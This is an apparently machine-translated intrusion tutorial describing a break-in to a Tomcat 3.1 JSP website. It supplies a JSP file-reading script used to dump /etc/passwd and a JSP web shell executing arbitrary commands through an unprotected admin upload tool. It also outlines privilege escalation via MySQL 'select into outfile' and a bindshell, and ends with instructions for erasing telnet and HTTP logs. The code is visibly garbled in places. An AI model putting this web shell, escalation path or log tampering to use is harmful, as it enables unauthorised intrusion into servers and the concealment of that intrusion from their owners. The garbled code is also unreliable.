How to intrude into JSP-based websites

By chance, when you browse a website, the page is fresh and comfortable. Websites are developed using JSP. For my personal interests, I decided to test the security of my system.

Telnet www.target.com 8080
GET/maid HTTP/1.1
[Enter]
[Enter]

The returned results are as follows:

HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2
. 2.12 i386; java. vendor = Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404

<H1> Error: 404 <H2> Location:/CHINANSL
The running WEBServer name "Tomcat 3.1" is obtained ". I remember I found this version of vulnerability and posted it to the bugtrap.

Recall that we can exit the WEB directory through the "..." technology, so:

Http: // target: 8080/.../../% 00.jsp (NO)
Http: // target: 8080/file/index. jsp (NO)
Http: // target: 8080/index. JSP (NO)
Http: // target: 8080/index. jsp % 81 (NO)
Http: // target: 8080/index. js % 70 (NO)
Http: // target: 8080/index. jsp % 2581 (NO)
Http: // target: 8080/WEB-INF/(NO)

It seems that the security status is good. Let's take a deeper test. Tomcat 3.1 comes with a management tool that allows you to view directories and files on the WEB and add context. So try:

Http: // destination: 8080/admin/

The Administrator did not delete or prohibit access to this directory. In terms of security, this is a very important mistake.

Next, click the "view all context" button to list the names of some files and directories under the WEB directory, and a component for uploading files will soon be found, use this component to upload a JSP file to the target WEB directory:

<% @ Page import = "java. io. *" %> 〉
<%
String file = request. getParameter ("file ");
String str = "";
FileInputStream FCM = null;
DataInputStream dis = null;
Try {
FS = new FileInputStream (file );
Dis = new DataInputStream (FCM );
While (true ){
Try {
Str = dis. readLine ();
} Catch (Exception e ){}
If (str = null) break;
Out. print (str + "<br> 〉");
}
} Catch (IOException e ){}
%> 〉

Then execute:

Http: // target: 8080/upload/test. jsp? File =/etc/passwd

The password is displayed. The next step is to guess the password and fail. However, now it is equivalent to having a SHELL. If you cannot guess the password, you can use IE as the SHELL environment first.

There are two pages in this news. Currently, there are two pages in page 1st.

Write another JSP file:

<% @ Page import = "java. io. *" %> 〉
<%
Try {
String cmd = request. getParameter ("cmd ");
Process child = runtime.getruntime(cmd.exe c (cmd );
InputStream in = child. getInputStream ();
Int c;
While (c = in. read ())! =-1 ){
Out. print (char) c );
}
In. close ();
Try {
Child. waitFor ();
} Catch (InterruptedException e ){
E. printStackTrace ();
}
} Catch (IOException e ){
System. err. println (e );
}
%> 〉

Then upload the JSP file through upload, and there is a SHELL.

Http: // target: 8080/upload/cmd. jsp? Cmd = ls +-la +/
(Detailed results are not listed here)

How can I obtain the root permission? After some searches, it is found that MySQL is installed in the system and the MySQL password is obtained from the JSP Source Code. Run:

Sqld "> http: // target: 8080/upload/cmd. jsp? Cmd = ps + aux + | grep + mysqld

Display:

Root 87494 0.2 1.9 17300 4800 p0-S 28Jun01. 72/usr/local/data/mysql

The system runs MySQL as the root user. Now I thought about it. Now that I know the MySQL password, I can write a SHELL program to create a table and put my data in the table, then use "select... into outfile; "to create a file on the system, allowing the user to run my program while executing the su. (Do you still remember that apache.org was intruded? This method is used by hackers ).

After that, it is relatively simple to upload a program such as bindshell, run the program, and obtain the nobody permission. You can use the setuid shell created by su root to make yourself a root user.

However, the following operations have taken place, and the results are quite surprising:

Http: // target: 8080/upload/cmd. jsp? Cmd = id

Display:

Uid = 0 (root) gid = 0 (xxx) groups = 0 (xxx), 2 (xxx), 3 (xxx), 4 (xxx), 5 (xxx ), 20 (xxx), 31 (xxx)

Originally, this web shell was ROOT! How does the Administrator perform security settings?

Http: // target: 8080/upload/cmd. jsp? Cmd = ps + aux
It was run as root (not listed)

The rest:

1. delete my telnet records.

2. Delete http logs.

To clear logs, I used cat xxx | grep-V "IP"> temp to overwrite the modified log files.

There are two pages in this news. Currently, there are two pages in page 2nd.